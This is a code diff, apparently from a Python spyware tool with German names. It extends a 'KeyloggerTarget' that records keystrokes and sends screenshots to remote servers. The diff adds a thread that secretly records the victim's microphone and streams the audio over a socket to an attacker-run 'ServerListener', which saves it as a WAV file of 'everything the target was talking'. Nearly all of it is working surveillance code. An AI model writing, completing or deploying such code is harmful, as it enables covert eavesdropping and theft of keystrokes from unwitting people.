@@ -6,7 +6,45 @@ import pyautogui as pg
 import subprocess
 import os
 import math
+import pyaudio
+import wave
+import threading
+import ast
 
+def daten_aufnehemen():
+    format = pyaudio.paInt16
+    kanäle = 2
+    rate = 44100
+    chunk = 1024
+    seconds = listening_time + 1
+
+    audio = pyaudio.PyAudio()
+
+    #start Recording
+    stream = audio.open(format=format, channels=kanäle,
+                        rate=rate, input=True,
+                        frames_per_buffer=chunk)
+    #print("recording...")
+    frames = []
+
+    for i in range(0, int(rate / chunk * seconds)):
+        data = stream.read(chunk)
+        frames.append(data)
+
+    #print("finished recording")
+
+    #stop Recording
+    stream.stop_stream()
+    stream.close()
+    audio.terminate()
+
+    listening_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    listening_data.connect((ip_listener, port_listener))
+    #Connection with ServerListener
+
+    str_frames = str(frames)
+    listening_data.send(str_frames.encode())
+    # Sends data to ServerListener
 
 def client(ip_photos, port_photos):
     global fhandle
@@ -91,19 +129,30 @@ def on_release(key):
 
 class KeyloggerTarget:
     def __init__(self, ip_of_server_photos, port_of_server_photos, ip_of_server_keylogger_data,
-                 port_of_server_keylogger_data, duration_in_seconds=200):
+                 port_of_server_keylogger_data,ip_of_server_listener, port_of_server_listener, duration_in_seconds=200):
+        global listening_time
+        global ip_listener
+        global port_listener
         # "duration_in_seconds" tells the programm how long it should last the default time is 200 seconds that's 3 Minutes and 20 Seconds
         self.ip_photos = ip_of_server_photos
         self.port_photos = port_of_server_photos
         self.ip_keylogger = ip_of_server_keylogger_data
         self.port_keylogger = port_of_server_keylogger_data
+        self.ip_listener = ip_of_server_listener
+        self.port_listener = port_of_server_listener
         self.duration = duration_in_seconds
 
+        ip_listener = self.ip_listener
+        port_listener = self.port_listener
+        listening_time = self.duration
+
     def start(self):
         if self.duration < 60:
             raise TypeError(f"{self.duration} is not greater and not equal to 60")
         # "duration_in_seconds" should always be bigger than 60 seconds
         else:
+            listening_thread = threading.Thread(target=daten_aufnehemen)
+            listening_thread.start()
             with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
                 countdown_send(self.duration, self.ip_photos, self.port_photos, self.ip_keylogger, self.port_keylogger)
                 listener.join()
@@ -154,9 +203,9 @@ class ServerPhotos:
     def start(self):
         server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         server.bind((self.ip, self.port))
-        server.listen(5)
+        server.listen(1000)
 
-        anzahl = 1
+        anzahl = 0
         while True:
             print("Waiting for connection...")
             client_socket, address = server.accept()
@@ -167,12 +216,47 @@ class ServerPhotos:
                 msg = client_socket.recv(200)
                 if len(msg) <= 0: break
                 full_msg += msg
-
             client_socket.close()
+            anzahl += 1
+
             with open(f"New_Image ({anzahl}).png", "wb") as file:
                 # This stores the image
                 file.write(full_msg)
 
-            anzahl += 1
             # "anzahl" is for the amount of photos
-            print(full_msg)
\ No newline at end of file
+            print(full_msg)
+
+class ServerListener:
+    def __init__(self, ip, port):
+        self.ip = ip
+        self.port = port
+
+    def start(self):
+        listening_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        listening_data.bind((self.ip, self.port))
+        listening_data.listen(5)
+        # 5 possible connection
+
+        print("Waiting for connection...")
+        # Waits for a connection
+
+        client_socket, ipaddress = listening_data.accept()
+        print(f"Connection has been established with {ipaddress}")
+        check = 0
+        full_msg = ""
+        while True:
+            msg = client_socket.recv(3000000).decode()
+            # The buffersize is 30000000 because there is a lot of data in audio files
+            if len(msg) <= 0: break
+            full_msg += msg
+
+        listening_data.close()
+        frames = ast.literal_eval(full_msg)
+        data_file = wave.open("test.wav", "wb")
+        data_file.setnchannels(2)
+        data_file.setsampwidth(2)
+        data_file.setframerate(44100)
+        data_file.writeframes(b''.join(frames))
+        data_file.close()
+
+        #This stores everything the target was talking
\ No newline at end of file
